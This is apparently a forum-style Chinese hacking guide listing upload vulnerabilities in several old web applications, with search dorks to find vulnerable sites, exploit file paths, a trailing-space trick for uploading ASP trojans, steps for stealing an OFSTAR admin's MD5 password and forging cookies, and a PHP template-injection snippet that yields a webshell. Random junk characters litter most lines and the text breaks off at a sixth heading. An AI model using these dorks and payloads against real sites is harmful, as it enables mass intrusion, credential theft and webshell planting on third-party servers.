一、E时代驿站漏洞
Mz_*`lRN 百度搜索"E时代驿站"
(bY#!16C: 漏洞利用页面 /upload.asp 用老兵直接上传
W&qE_r %&0_0BU 二、沸腾新闻系统上传漏洞
8V?O=3<a 搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用
HsO4C)/ 漏洞:没有对空格进行严格的限制。
\:, dWLu 所以,我们直接选定要上传的asp木马,然后在后面加上空格
Cwl#(;@ 它的上传文件是UploadFaceOK.asp
0& 54xP w|7<y8#qC 三、尘缘雅境
jw]~g+x#$ EA8K*>'pv 在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看
|p}qK
Fdi 到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页是
http://www.xx.com/asfq/index.asp,那么就要这样填写
http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目录]:/asfq/admin(注意一定要加上admin),[漏洞文件]一般不用改,不过有些老版的尘缘系统的漏洞文是uploadok.asp,如果uploadfaceok.asp不成功再改
T_i]y4dg 0
fX 四、OFSTAR论坛漏洞利用程序(群共享中)
'#L.w6<B 搜索: powered by ofstar.net
\L Gj]mb1 1:输入管理员用户名
FMhSHa/B 2:输入任意一个帖子的路径!
RX3P%xZ 3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的!
:A9G>qg 4:单击直接登陆按钮!程序会自动构造Cookies进行锹?单击管理栏的"超管"可直接进入后台!
BxVo>r 0rP`BK| 上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样)
b S[;d5 'tm%3`
F 然后使用提交页面提交``可以直接拿到shell!
T*e>_\Tx S3l$\X;6X <style type='text/css'>
:+: vBrJm </style>
eD2u!OKW! <!--
[oqb@J2 EOT;
=^#^Mq) ?>-->
lu2"?y[2 <?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
<?znk8| <!--
6qp2C]9= <?php
e:#c\Ay+ print <<<EOT
D',[M) -->
K=nW|^ mWN9/+! 五、破废墟BLOG漏洞
N{w)}me[YY 百度搜:"破废墟 Bloging" ,在后面加上upfile.asp,结果返回
wC{?@h DLOG错误:提交的数据来自网站外部 | 返 回
MZ]#9/ 或者 您要访问的网页有问题,无法显示。
SkU'JM7<95 HTTP 500 - 内部服务器错误
G;Jqby8d 这说明这个文件是存在的,但是无法正常的访问,其实我们也可以利用
]#x!mZ! 直接用老兵上传木马
http://www.xxxxx.com/blog/upfile.asp b+7!$ Y=94<e[f" 六、动网论坛
SFP%UfM<